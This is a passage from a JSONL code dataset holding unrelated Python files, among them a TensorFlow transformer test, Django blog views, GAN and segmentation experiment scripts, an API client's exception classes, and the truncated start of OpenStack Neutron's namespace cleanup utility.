use_pad_mask\n\n params['use_pooler'] = use_pooler\n params['use_masked_lm'] = use_masked_lm\n params['use_next_sp'] = use_next_sp\n\n params['do_seq_class_task'] = do_seq_class_task\n params['do_tok_class_task'] = do_tok_class_task\n params['do_qa_task'] = do_qa_task\n params['do_mult_choice_task'] = do_mult_choice_task\n\n params['task_num_choices'] = task_num_choices\n params['seq_class_num_labels'] = seq_class_num_labels\n params['tok_class_num_labels'] = tok_class_num_labels\n\n # tf.enable_eager_execution()\n model = TransformerEncoder(**params)\n\n cur_len = np.random.randint(3, max_len + 1)\n if do_mult_choice_task:\n batch_size = np.random.randint(2, 4) * task_num_choices\n else:\n batch_size = np.random.randint(2, 10)\n\n expected_inputs = []\n expected_outputs_shape = []\n\n # tokens, segment_ids, pos_ids, attn_mask, pad_mask\n\n token_data = np.random.randint(0, vocab_size, size=(batch_size, cur_len))\n token = tf.constant(token_data, dtype=tf.int32)\n expected_inputs.append(token)\n if num_segments > 0:\n segment_ids = tf.constant(\n np.random.randint(0, num_segments, size=(batch_size, cur_len)),\n dtype=tf.int32\n )\n expected_inputs.append(segment_ids)\n\n pos_ids = tf.constant(\n np.array(\n [list(range(cur_len)) for _ in range(batch_size)],\n dtype=np.int32\n ),\n dtype=tf.int32\n )\n expected_inputs.append(pos_ids)\n\n if use_attn_mask:\n attn_mask = np.equal(token_data, 0, dtype=np.float32)\n attn_mask = attn_mask.astype(np.float32)\n attn_mask = attn_mask.reshape((batch_size, 1, cur_len))\n attn_mask = np.ones((batch_size, cur_len, 1),\n dtype=np.float32) * attn_mask\n attn_mask = attn_mask.reshape((batch_size, 1, cur_len, cur_len))\n attn_mask = tf.constant(attn_mask)\n expected_inputs.append(attn_mask)\n\n if use_pad_mask:\n pad_mask = np.equal(token_data, 0, dtype=np.float32)\n pad_mask = pad_mask.astype(np.float32)\n pad_mask = pad_mask.reshape((batch_size, cur_len, 1))\n pad_mask = tf.constant(pad_mask)\n expected_inputs.append(pad_mask)\n\n expected_outputs_shape.append([batch_size, cur_len, d_out])\n if model.use_pooler:\n expected_outputs_shape.append([batch_size, d_out])\n if model.use_masked_lm:\n expected_outputs_shape.append([batch_size, cur_len, vocab_size])\n if model.use_next_sp:\n expected_outputs_shape.append([batch_size, 2])\n\n if model.do_seq_class_task:\n expected_outputs_shape.append([batch_size, seq_class_num_labels])\n if model.do_mult_choice_task:\n expected_outputs_shape.append(\n [batch_size // task_num_choices, task_num_choices])\n if model.do_tok_class_task:\n expected_outputs_shape.append(\n [batch_size, cur_len, tok_class_num_labels])\n if model.do_qa_task:\n expected_outputs_shape.append([batch_size, cur_len])\n expected_outputs_shape.append([batch_size, cur_len])\n\n if not tf.executing_eagerly():\n graph = model(expected_inputs)\n init = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n sess.run(init)\n outputs = sess.run(graph)\n else:\n outputs = model(expected_inputs)\n\n if isinstance(outputs, (list, tuple)):\n assert len(expected_outputs_shape) == len(outputs), \\\n (f'Params: {params}'\n f'Expected: {expected_outputs_shape}'\n f'Outputs: {[v.shape for v in outputs]}')\n for i, v in enumerate(outputs):\n assert list(v.shape) == expected_outputs_shape[i], \\\n (f'Params: {params}'\n f'Expected: {expected_outputs_shape}'\n f'Outputs: {[v.shape for v in outputs]}'\n f'Index: {i}')\n\n else:\n assert len(expected_outputs_shape) == 1, \\\n (f'Params: {params}'\n f'Expected: {expected_outputs_shape}'\n f'Outputs: {outputs.shape}')\n\n assert list(outputs.shape) == expected_outputs_shape[0], \\\n (f'Params: {params}'\n f'Expected: {expected_outputs_shape}'\n f'Outputs: {outputs.shape}')\n","repo_name":"jerpint/jag","sub_path":"unit_tests/test_transformer.py","file_name":"test_transformer.py","file_ext":"py","file_size_in_byte":6598,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34309187361","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef draw(x,y,name,x_name,y_name):\n plt.clf()\n x_idx = np.arange(len(x))\n plt.bar(x_idx, y)\n plt.xticks(x_idx,x)\n plt.xlabel(x_name)\n plt.ylabel(y_name)\n # plt.ylim([y_min,y_max])\n plt.title(name)\n plt.savefig(name)\n\nif __name__==\"__main__\":\n with open(\"gtx1080\",\"r\", newline=\"\") as f:\n data = f.read().splitlines()\n modelname = list()\n h2d = list()\n d2d = list()\n d2h = list()\n total = list()\n for i in data:\n i = i.split(\" \")\n modelname.append(i[0])\n total.append(float(i[1]))\n h2d.append(float(i[7]))\n d2d.append(float(i[8]))\n d2h.append(float(i[9]))\n draw(modelname, total, \"GTX1080 total inference time\", \"model name\", \"time(ms)\")\n draw(modelname, h2d, \"GTX1080 total HtoD time\", \"model_name\", \"time(ms)\")\n draw(modelname, d2d, \"GTX1080 total DtoD time\", \"model_name\", \"time(ms)\")\n draw(modelname, d2h, \"GTX1080 total DtoH time\", \"model_name\", \"time(ms)\")\n \n with open(\"rtx2060\", \"r\", newline=\"\") as f:\n data = f.read().splitlines()\n modelname = list()\n h2d = list()\n d2d = list()\n d2h = list()\n total = list()\n for i in data:\n i = i.split(\" \")\n modelname.append(i[0])\n total.append(float(i[1]))\n h2d.append(float(i[6]))\n d2d.append(float(i[7]))\n d2h.append(float(i[8]))\n print(h2d)\n print(d2d)\n print(d2h)\n draw(modelname, total, \"RTX2060 total inference time\", \"model name\", \"time(ms)\")\n draw(modelname, h2d, \"RTX2060 total HtoD time\", \"model_name\", \"time(ms)\")\n draw(modelname, d2d, \"RTX2060 total DtoD time\", \"model_name\", \"time(ms)\")\n draw(modelname, d2h, \"RTX2060 total DtoH time\", \"model_name\", \"time(ms)\")\n","repo_name":"chilin0525/tmp","sub_path":"draw_image.py","file_name":"draw_image.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39787331918","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom django.utils import timezone\n\nfrom .forms import PostForm\nfrom .models import Post\n\n\ndef about(request):\n return render(request, 'blog/about.html')\n\n\ndef contact_page(request):\n return render(request, 'blog/contact.html')\n\n\ndef home(request):\n return render(request, 'blog/home.html')\n\n\ndef post_detail(request, slug):\n post = get_object_or_404(Post, slug=slug)\n return render(request, 'blog/post_detail.html', {'post': post})\n\n\n@login_required\ndef post_draft_list(request):\n posts = Post.objects.filter(published_date__isnull=True).order_by('created_date')\n return render(request, 'blog/post_draft_list.html', {'posts': posts})\n\n\n@login_required\ndef post_edit(request, slug):\n post = get_object_or_404(Post, slug=slug)\n if request.method == \"POST\":\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.publish() if request.user.is_superuser else post.save()\n return redirect('post_detail', slug=post.slug)\n else:\n form = PostForm(instance=post)\n return render(request, 'blog/post_edit.html', {'form': form})\n\n\ndef post_list(request):\n posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n return render(request, 'blog/blog.html', {'posts': posts})\n\n\n@login_required\ndef post_new(request):\n if request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.publish() if request.user.is_superuser else post.save()\n return redirect('post_detail', slug=post.slug)\n else:\n form = PostForm()\n return render(request, 'blog/post_edit.html', {'form': form})\n\n\n@login_required\ndef post_publish(request, pk):\n post = get_object_or_404(Post, pk=pk)\n post.publish()\n return redirect('post_detail', pk=pk)\n\n\n@login_required\ndef post_remove(request, pk):\n post = get_object_or_404(Post, pk=pk)\n post.delete()\n return redirect('post_list')\n","repo_name":"bnx05/hello-django","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15149199499","text":"# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nimport copy\r\n\r\n# input = sys.stdin.readline\r\n\r\n# ~~~~~~~~~~~~~~~~~~~~~_(??? ? ?)_~~~~~~~~~~~~~~~~~~~~~\r\n\r\n\r\nN = int(input())\r\n\r\nsum = 0\r\n\r\nfor _ in range(N):\r\n a, b = map(int, input().split())\r\n sum += a * b\r\n\r\nprint(int(sum * 1.05))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc009/A/4981982.py","file_name":"4981982.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"8834056055","text":"from __future__ import print_function\nimport os,sys\nfrom PIL import Image\n\npath = \"/mnt/home/mengfanr/Arabidopsis_seeds_detect/faster_rcnn_seeds_part_tiles_all_1500/test_image_new_half_half_results\"\nos.chdir(path)\nfor root, dirs, files in os.walk(path):\n for f in files:\n if f.startswith(sys.argv[1]+'_0_0'):\n f1=f\n elif f.startswith(sys.argv[1]+'_1_0'):\n f2=f\n elif f.startswith(sys.argv[1]+'_0_1'):\n f3=f\n elif f.startswith(sys.argv[1]+'_1_1'):\n f4=f\nc1=f1.split(\".\")[-2].split(\"_\")[1]\nc2=f2.split(\".\")[-2].split(\"_\")[1]\nc3=f3.split(\".\")[-2].split(\"_\")[1]\nc4=f4.split(\".\")[-2].split(\"_\")[1]\ncount = int(c1)+int(c2)+int(c3)+int(c4)\nfiles = [f1,f2,f3,f4]\n\nresult = Image.new(\"RGB\", (2900, 2900))\n\nfor index, file in enumerate(files):\n path = os.path.expanduser(file)\n img = Image.open(path)\n img.thumbnail((1450, 1450), Image.ANTIALIAS)\n x = index // 2 * 1450\n y = index % 2 * 1450\n w, h = img.size\n result.paste(img, (x, y, x + w, y + h))\n\nresult.save(os.path.expanduser(sys.argv[1]+\"_merge_\"+str(count)+\".jpg\"))\n","repo_name":"ShiuLab/Manuscript_Code","sub_path":"2022_Arabidopsis_seed_and_fruit_count/Scripts_for_Faster_R-CNN/08_02_merge_images.py","file_name":"08_02_merge_images.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"43613655073","text":"\"\"\"Provide exception classes for the stare package.\"\"\"\n\nimport sys\nimport json\n\ntry:\n from json.decoder import JSONDecodeError\nexcept ImportError:\n JSONDecodeError = ValueError\n\nif sys.version_info[0] == 2:\n from urlparse import urlparse\nelse:\n from urllib.parse import urlparse\n\n\nclass GlanceDBException(Exception):\n \"\"\"Base exception class for exceptions that occur within this package.\"\"\"\n\n\nclass InvalidInvocation(GlanceDBException):\n \"\"\"Indicate that the code to execute cannot be completed.\"\"\"\n\n\nclass ResponseException(GlanceDBException):\n \"\"\"Indicate that there was an error with the completed HTTP request.\"\"\"\n\n def __init__(self, response, additional_message=None):\n \"\"\"Initialize a ResponseException instance.\n :param response: A requests.response instance.\n \"\"\"\n self.response = response\n message = 'received {} HTTP response'.format(response.status_code)\n try:\n if additional_message is None:\n additional_message = json.dumps(response.json(), indent=2)\n\n except JSONDecodeError:\n additional_message = response.text.strip()\n\n if additional_message:\n message = '{}. The following details may help:\\n{}'.format(\n message, additional_message\n )\n super(ResponseException, self).__init__(message)\n\n\nclass ExchangeFailure(ResponseException):\n \"\"\"Indicate that exchanging the access token failed.\"\"\"\n\n\nclass BadJSON(ResponseException):\n \"\"\"Indicate the response did not contain valid JSON.\"\"\"\n\n\nclass BadRequest(ResponseException):\n \"\"\"Indicate invalid parameters for the request.\"\"\"\n\n\nclass Conflict(ResponseException):\n \"\"\"Indicate a conflicting change in the target resource.\"\"\"\n\n\nclass Forbidden(ResponseException):\n \"\"\"Indicate the authentication is not permitted for the request.\"\"\"\n\n def __init__(self, response):\n additional_message = None\n try:\n additional_message = (\n response.json()\n .get('uuAppErrorMap', {})\n .get('uu-app-workspace/authorization/userIsNotAuthorized', {})\n .get('message', None)\n )\n except JSONDecodeError:\n pass\n super(Forbidden, self).__init__(response, additional_message)\n\n\nclass NotFound(ResponseException):\n \"\"\"Indicate that the requested URL was not found.\"\"\"\n\n\nclass Redirect(ResponseException):\n \"\"\"Indicate the request resulted in a redirect.\n\n This class adds the attribute ``path``, which is the path to which the\n response redirects.\n\n \"\"\"\n\n def __init__(self, response):\n \"\"\"Initialize a Redirect exception instance.\n\n :param response: A requests.response instance containing a location\n header.\n\n \"\"\"\n path = urlparse(response.headers['location']).path\n self.path = path[:-5] if path.endswith('.json') else path\n self.response = response\n GlanceDBException.__init__(self, 'Redirect to {}'.format(self.path))\n\n\nclass ServerError(ResponseException):\n \"\"\"Indicate issues on the server end preventing request fulfillment.\"\"\"\n\n\nclass SpecialError(ResponseException):\n \"\"\"Indicate syntax or spam-prevention issues.\"\"\"\n\n def __init__(self, response):\n \"\"\"Initialize a SpecialError exception instance.\n\n :param response: A requests.response instance containing a message\n and a list of special errors.\n\n \"\"\"\n self.response = response\n\n resp_dict = self.response.json() # assumes valid JSON\n self.message = resp_dict.get('message', '')\n self.reason = resp_dict.get('reason', '')\n self.special_errors = resp_dict.get('special_errors', [])\n GlanceDBException.__init__(self, 'Special error {!r}'.format(self.message))\n\n\nclass TooLarge(ResponseException):\n \"\"\"Indicate that the request data exceeds the allowed limit.\"\"\"\n\n\nclass UnavailableForLegalReasons(ResponseException):\n \"\"\"Indicate that the requested URL is unavilable due to legal reasons.\"\"\"\n\n\nclass UnhandledResponse(ResponseException):\n \"\"\"Indicate a response status code we have not dealt with yet.\"\"\"\n","repo_name":"kratsg/stare","sub_path":"src/stare/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"31373617254","text":"from tf_version_mnist.discriminator import *\nfrom tf_version_mnist.generator import *\nimport tensorflow as tf\nimport sklearn.svm as svm\nimport matplotlib.pyplot as plt\n\n\nn_trials = 1000 # number of trials\nn_t = 100 # total number of training points\nz_dim = 100 # generator input dimension\nbatch_size = 64 # size of input batch\ny_dim = 2 # number of classes\nchannel = 1 # number of channels, MNIST is grayscale\nim_dim = 28 # dimension of 1 side of image\ngen_share = 0.4 # % of training set to be generated\nnoise_norm = 13. # norm of a random noise\ndata_shift = 0\nvalidation_crit_val = 3.69\nskip_validation = True\nlabels_to_use = [5, 6]\nmodel_to_load = '01-17_15_41_0.75'\nmodel_path = '/home/iindyk/PycharmProjects/my_GAN/saved_models_my_GAN/' + model_to_load + '/model.ckpt'\n\n\n(x_train_all, y_train_all), (x_test_all, y_test_all) = tf.keras.datasets.mnist.load_data()\nx_train_all, x_test_all = x_train_all/255., x_test_all/255.\nx_train_all, x_test_all = x_train_all-np.mean(x_train_all), x_test_all-np.mean(x_test_all)\n\n# take only images of digits from labels_to_use\nx_train = []\ny_train = []\n\nn_orig = int(n_t*(1-gen_share))\n\nfor i in range(len(y_train_all)):\n if y_train_all[i] == labels_to_use[0]:\n x_train.append(x_train_all[i])\n y_train.append([1., 0.])\n elif y_train_all[i] == labels_to_use[1]:\n x_train.append(x_train_all[i])\n y_train.append([0., 1.])\n\nx_test = []\ny_test = []\nfor i in range(len(y_test_all)):\n if y_test_all[i] == labels_to_use[0]:\n x_test.append(x_test_all[i])\n y_test.append(1)\n elif y_test_all[i] == labels_to_use[1]:\n x_test.append(x_test_all[i])\n y_test.append(-1)\n\nx_train = np.array(x_train, dtype=np.float32)\ny_train = np.array(y_train, dtype=np.float32)\nx_test = np.reshape(np.array(x_test, dtype=np.float32), newshape=(-1, 784))\ny_test = np.array(y_test, dtype=np.float32)\n\n# placeholder for input images to the discriminator\nx_placeholder = tf.placeholder(\"float\", shape=[batch_size, im_dim, im_dim, channel])\ny_placeholder = tf.placeholder(\"float\", shape=[batch_size, y_dim])\n# placeholder for input noise vectors to the generator\nz_placeholder = tf.placeholder(tf.float32, [None, z_dim])\n\ndiscriminator = Discriminator1(batch_size, y_dim)\ngenerator = Generator1(None, batch_size, y_dim, im_dim, channel,\n initial_x_train=[], initial_y_train=[], x_test=[], y_test=[])\n\n# d_x will hold discriminator prediction probabilities\n_, d_x = discriminator.act(x_placeholder, y_placeholder)\n# g_z holds the generated images\ng_z = generator.act(z_placeholder, y_placeholder)\n\nsaver = tf.train.Saver()\nwith tf.Session() as sess:\n # restore model from file\n saver.restore(sess, model_path)\n print(\"Model restored.\")\n\n errs = []\n false_neg = []\n\n # false positive rate calculation\n false_pos = 0\n _dt_tmp = np.append(np.reshape(x_train[data_shift:n_orig + data_shift], newshape=(-1, 784)),\n np.zeros((batch_size - n_orig, 784)), axis=0)\n _lb_tmp = np.append(y_train[data_shift:n_orig + data_shift], [[0., 1.]] * (batch_size - n_orig), axis=0)\n val = sess.run(d_x, feed_dict={\n x_placeholder: np.reshape(_dt_tmp, newshape=[batch_size, im_dim, im_dim, channel]),\n y_placeholder: _lb_tmp})\n for k in range(batch_size):\n if val[k, 0] <= validation_crit_val and k < n_orig:\n false_pos += 1\n\n for trial in range(n_trials):\n\n indices = np.random.randint(low=n_orig+data_shift, high=len(y_train), size=n_t-n_orig)\n additional_y_train = y_train[indices, :]\n noise = np.random.uniform(low=-1., high=1., size=(n_t-n_orig, 784))\n # normalize noise\n noise = np.array([(noise[i]/np.linalg.norm(noise[i]))*noise_norm for i in range(len(noise))])\n additional_x_train = np.reshape(x_train[indices, :, :], (-1, 784)) + noise\n\n train_data_tmp = np.append(np.reshape(x_train[data_shift:n_orig+data_shift], newshape=(-1, 784)),\n additional_x_train[:n_t-n_orig], axis=0)\n train_labels_tmp = np.append(y_train[data_shift:n_orig+data_shift],\n additional_y_train[:n_t-n_orig], axis=0)\n\n train_data = []\n train_labels = []\n\n f_n = 0\n\n # validation\n for j in range(n_t//batch_size+1):\n if (j+1)*batch_size <= n_t:\n x_batch = train_data_tmp[j*batch_size:(j+1)*batch_size]\n y_batch = train_labels_tmp[j*batch_size:(j+1)*batch_size]\n else:\n x_batch = np.append(train_data_tmp[j*batch_size:], np.zeros(((j+1)*batch_size-n_t, 784)), axis=0)\n y_batch = np.append(train_labels_tmp[j*batch_size:], [[0., 1.]]*((j+1)*batch_size-n_t), axis=0)\n\n # calculate statistics values\n stat_vals = sess.run(d_x, feed_dict={\n x_placeholder: np.reshape(x_batch, newshape=[batch_size, im_dim, im_dim, channel]),\n y_placeholder: y_batch})\n for k in range(batch_size):\n if k+j*batch_size < n_t:\n was_generated = (k+j*batch_size >= int(n_t*(1-gen_share)))\n validation_success = stat_vals[k, 0] > validation_crit_val or skip_validation\n if validation_success:\n train_data.append(np.reshape(x_batch[k], newshape=784))\n train_labels.append(1. if y_batch[k, 0] == 1. else -1.)\n\n if validation_success and was_generated:\n f_n += 1\n\n false_neg.append(f_n)\n svc = svm.LinearSVC(loss='hinge').fit(train_data, train_labels)\n errs.append(1 - svc.score(x_test, y_test))\n\n# show noisy images\nfig = plt.figure(figsize=(2, 2))\ncolumns = 2\nrows = 2\nfor i in range(1, columns*rows + 1):\n img = np.reshape(additional_x_train[-i-1], newshape=(28, 28))\n fig.add_subplot(rows, columns, i)\n plt.imshow(img, cmap='gray_r')\nplt.show()\n\nprint('error=', np.mean(errs)*100, '+-', (np.std(errs)*1.96/np.sqrt(n_trials))*100)\n\nif not skip_validation:\n print('false negative=', (np.mean(false_neg)/int(n_t*gen_share))*100,\n '+-', (np.std(false_neg)*100/int(n_t*gen_share))*1.96/np.sqrt(n_trials))\n print('false positive=', false_pos / n_orig*100)\n\n","repo_name":"iindyk/my_GAN","sub_path":"tf_version_mnist/random_noise_detection.py","file_name":"random_noise_detection.py","file_ext":"py","file_size_in_byte":6409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41305987462","text":"\"\"\"\n • On the first line, you will receive the number (an integer)\n • On the second line, you will receive a number, which is the logarithm base.\n It can be either a number or the word \"natural\"\nThe output should be formatted to the 2nd decimal digit\n\"\"\"\n\nfrom math import log\n\nx = int(input(\"enter argument:\\n\"))\nbase = input(\"select the base, 'natural' or a number:\\n\")\nif base.lstrip('-').isnumeric():\n exponent = log(x, int(base))\nelse:\n exponent = log(x)\nprint(f\"{exponent: .2f}\")\n","repo_name":"h-dmt/Python_Advanced","sub_path":"8_modules/calculate_logarithm.py","file_name":"calculate_logarithm.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39615120899","text":"from __future__ import division\nimport numpy as np\nimport cv2\n\n\ndef load_test_data(image_path, fine_size=512):\n img = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (fine_size, fine_size), interpolation=cv2.INTER_AREA)\n img = np.array(img).reshape([fine_size, fine_size, 1]) / 127.5 -1\n return img\n\n\ndef load_train_data(image_path, options):\n img_A = cv2.imread(image_path[0], cv2.IMREAD_GRAYSCALE)\n img_B = cv2.imread(image_path[1], cv2.IMREAD_COLOR)\n img_B = img_B[:, :, ::-1] # OpenCV read images in BGR order\n label_B = target_rgb2label(img_B, options.label_colors) # label map\n\n is_cropping = True if np.random.random() > 0.8 else False\n if not is_cropping:\n img_A = cv2.resize(img_A, (options.load_size, options.load_size), interpolation=cv2.INTER_AREA)\n label_B = cv2.resize(label_B, (options.load_size, options.load_size), interpolation=cv2.INTER_NEAREST)\n h1 = int(np.ceil(np.random.uniform(1e-2, options.load_size - options.image_size)))\n w1 = int(np.ceil(np.random.uniform(1e-2, options.load_size - options.image_size)))\n img_A = img_A[h1:h1 + options.image_size, w1:w1 + options.image_size]\n label_B = label_B[h1:h1 + options.image_size, w1:w1 + options.image_size]\n else:\n img_A = cv2.resize(img_A, (options.image_size, options.image_size), interpolation=cv2.INTER_AREA)\n label_B = cv2.resize(label_B, (options.image_size, options.image_size), interpolation=cv2.INTER_NEAREST)\n\n # img_A: (fine_size, fine_size) >> np_A: (fine_size, fine_size, 1)\n np_A = np.array(img_A) / 127.5 -1\n np_A = np_A.reshape([options.image_size, options.image_size, 1])\n\n # label_B: (fine_size,fine_size) >> np_B: (fine_size, fine_size, output_nc)\n np_B = np.zeros([options.image_size, options.image_size, options.output_nc], dtype=np.float32)\n for it in range(options.output_nc):\n rr, cc = np.where(label_B == it)\n np_B[rr, cc, it] = 1\n\n # img_AB shape: (fine_size, fine_size, input_c_dim + output_c_dim )\n return np.concatenate((np_A, np_B), axis=2)\n\n\ndef save_pred(logits, image_path, label_colors):\n logit = logits[0] if len(logits.shape) == 4 else logits\n pred_label = np.argmax(logit, axis=-1)\n img = target_label2rgb(pred_label, label_colors)\n return cv2.imwrite(image_path, img[:, :, ::-1])\n\n\ndef target_rgb2label(target_img, label_colors):\n width, height, _ = target_img.shape\n target_label = np.zeros([width, height], dtype=np.uint8)\n for it in range(1, len(label_colors)):\n rr, cc = np.where(np.all(target_img == label_colors[it], axis=-1))\n target_label[rr, cc] = it\n return target_label\n\n\ndef target_label2rgb(target_np, label_colors):\n width, height = target_np.shape\n target_img = np.zeros([width, height, 3], dtype=np.uint8)\n target_img[:] = label_colors[0] # background\n for it in range(np.max(target_np)):\n rr, cc = np.where(target_np == it+1)\n target_img[rr, cc, :] = label_colors[it+1]\n return target_img\n\n# grid\ndef load_train_patch(image_path, options):\n img_A = cv2.imread(image_path[0], cv2.IMREAD_GRAYSCALE)\n img_B = cv2.imread(image_path[1], cv2.IMREAD_COLOR)\n img_B = img_B[:, :, ::-1] # OpenCV read images in BGR order\n label_B = target_rgb2label(img_B, options.label_colors) # label map\n\n # scale_ratio\n img_A = cv2.resize(img_A, (0,0), fx=options.scale, fy=options.scale, interpolation=cv2.INTER_AREA)\n label_B = cv2.resize(label_B, (0,0), fx=options.scale, fy=options.scale, interpolation=cv2.INTER_NEAREST)\n\n height, width = img_A.shape[0:2]\n if height < options.image_size:\n pad_h = options.image_size-height\n img_A = np.vstack((img_A, 255 * np.ones((pad_h, width))))\n height, width = img_A.shape[0:2]\n if width < options.image_size:\n pad_w = options.image_size - width\n img_A = np.hstack((img_A, 255 * np.ones((height, pad_w))))\n\n # patch\n height, width = img_A.shape[0:2]\n crop_name, crop_img, crop_label, crop_white = [], [], [], []\n overlapping = min((1 - 1 / options.image_size), options.overlapping)\n w_num = int(width / options.image_size / (1-overlapping))\n h_num = int(height / options.image_size / (1-overlapping))\n\n np_A = np.array(img_A).reshape([height, width, 1])\n np_B = np.zeros([height, width, options.output_nc], dtype=np.float32)\n for it in range(options.output_nc):\n rr, cc = np.where(label_B == it)\n np_B[rr, cc, it] = 1\n\n for (h, w) in [(h_, w_) for h_ in range(h_num) for w_ in range(w_num)]:\n h1 = int(h / (h_num - 1) * (height - options.image_size)) if not h_num == 1 else 0\n w1 = int(w / (w_num - 1) * (width - options.image_size)) if not w_num == 1 else 0\n cur_img = np_A[h1:h1 + options.image_size, w1:w1 + options.image_size, :]\n cur_label = np_B[h1:h1 + options.image_size, w1:w1 + options.image_size, :]\n is_white = True if (np.sum(cur_img > 245) / options.image_size ** 2) > 0.98 else False # threshold = 0.95\n\n cur_img = cur_img / 127.5 - 1\n crop_name.append((w, h))\n crop_img.append(cur_img)\n crop_label.append(cur_label)\n crop_white.append(is_white)\n\n return np.array(crop_name), np.array(crop_img), np.array(crop_label), np.array(crop_white)","repo_name":"syoi92/Archive_FPNetSNU","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"40438465339","text":"# -*- coding: utf-8 -*-\n# @Author: Lich_Amnesia\n# @Email: alwaysxiaop@gmail.com\n# @Date: 2016-10-25 12:26:20\n# @Last Modified time: 2016-10-25 12:28:05\n# @FileName: 301.py\n\n\nclass Solution(object):\n\n def removeInvalidParentheses(self, s):\n \"\"\"\n :type s: str\n :rtype: List[str]\n \"\"\"\n\n def dfs(s):\n m = calc(s)\n if m == 0:\n return [s]\n ans = []\n for i in range(len(s)):\n if s[i] in ('(', ')'):\n new_s = s[:i] + s[i + 1:]\n if new_s not in vis and calc(new_s) < m:\n vis.add(new_s)\n ans.extend(dfs(new_s))\n return ans\n\n def calc(s):\n a, b = 0, 0\n for c in s:\n a += {'(': 1, ')': -1}.get(c, 0)\n b += a < 0\n a = max(a, 0)\n return a + b\n\n vis = set([s])\n return dfs(s)\n","repo_name":"LichAmnesia/LeetCode","sub_path":"python/301.py","file_name":"301.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8670221701","text":"import itertools\nimport re\nimport signal\nimport time\n\nfrom neutron_lib import constants\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nfrom oslo_utils import importutils\n\nfrom neutron.agent.common import ovs_lib\nfrom neutron.agent.l3 import dvr_fip_ns\nfrom neutron.agent.l3 import dvr_snat_ns\nfrom neutron.agent.l3 import namespaces\nfrom neutron.agent.linux import dhcp\nfrom neutron.agent.linux import external_process\nfrom neutron.agent.linux import ip_lib\nfrom neutron.agent.linux import utils\nfrom neutron.common import config\nfrom neutron.conf.agent import cmd\nfrom neutron.conf.agent import common as agent_config\nfrom neutron.conf.agent import dhcp as dhcp_config\nfrom neutron.privileged.agent.linux import utils as priv_utils\n\nLOG = logging.getLogger(__name__)\nNS_PREFIXES = {\n 'dhcp': [dhcp.NS_PREFIX],\n 'l3': [namespaces.NS_PREFIX, dvr_snat_ns.SNAT_NS_PREFIX,\n dvr_fip_ns.FIP_NS_PREFIX],\n}\nSIGTERM_WAITTIME = 10\n\n\nclass PidsInNamespaceException(Exception):\n pass\n\n\nclass FakeDhcpPlugin(object):\n \"\"\"Fake RPC plugin to bypass any RPC calls.\"\"\"\n def __getattribute__(self, name):\n def fake_method(*args):\n pass\n return fake_method\n\n\ndef setup_conf():\n \"\"\"Setup the cfg for the clean up utility.\n\n Use separate setup_conf for the utility because there are many options\n from the main config that do not apply during clean-up.\n \"\"\"\n\n conf = cfg.CONF\n config.register_common_config_options()\n cmd.register_cmd_opts(cmd.netns_opts, conf)\n agent_config.register_interface_driver_opts_helper(conf)\n dhcp_config.register_agent_dhcp_opts(conf)\n agent_config.register_interface_opts()\n return conf\n\n\ndef _get_dhcp_process_monitor(config):\n return external_process.ProcessMonitor(config=config,\n resource_type='dhcp')\n\n\ndef kill_dhcp(conf, namespace):\n \"\"\"Disable DHCP for a network if DHCP is still active.\"\"\"\n network_id = namespace.replace(dhcp.NS_PREFIX, '')\n\n dhcp_driver = importutils.import_object(\n conf.dhcp_driver,\n conf=conf,\n process_monitor=_get_dhcp_process_monitor(conf),\n network=dhcp.NetModel({'id': network_id}),\n plugin=FakeDhcpPlugin())\n\n if dhcp_driver.active:\n dhcp_driver.disable()\n\n\ndef eligible_for_deletion(conf, namespace, force=False):\n \"\"\"Determine whether a namespace is eligible for deletion.\n\n Eligibility is determined by having only the lo device or if force\n is passed as a parameter.\n \"\"\"\n\n if conf.agent_type:\n prefixes = NS_PREFIXES.get(conf.agent_type)\n else:\n prefixes = itertools.chain(*NS_PREFIXES.values())\n ns_mangling_pattern = '(%s%s)' % ('|'.join(prefixes),\n constants.UUID_PATTERN)\n\n # filter out namespaces without UUID as the name\n if not re.match(ns_mangling_pattern, namespace):\n return False\n\n ip = ip_lib.IPWrapper(namespace=namespace)\n return force or ip.namespace_is_empty()\n\n\ndef unplug_device(device):\n orig_log_fail_as_error = device.get_log_fail_as_error()\n device.set_log_fail_as_error(False)\n try:\n device.link.delete()\n except RuntimeError:\n device.set_log_fail_as_error(orig_log_fail_as_error)\n # Maybe the device is OVS port, so try to delete\n ovs = ovs_lib.BaseOVS()\n bridge_name = 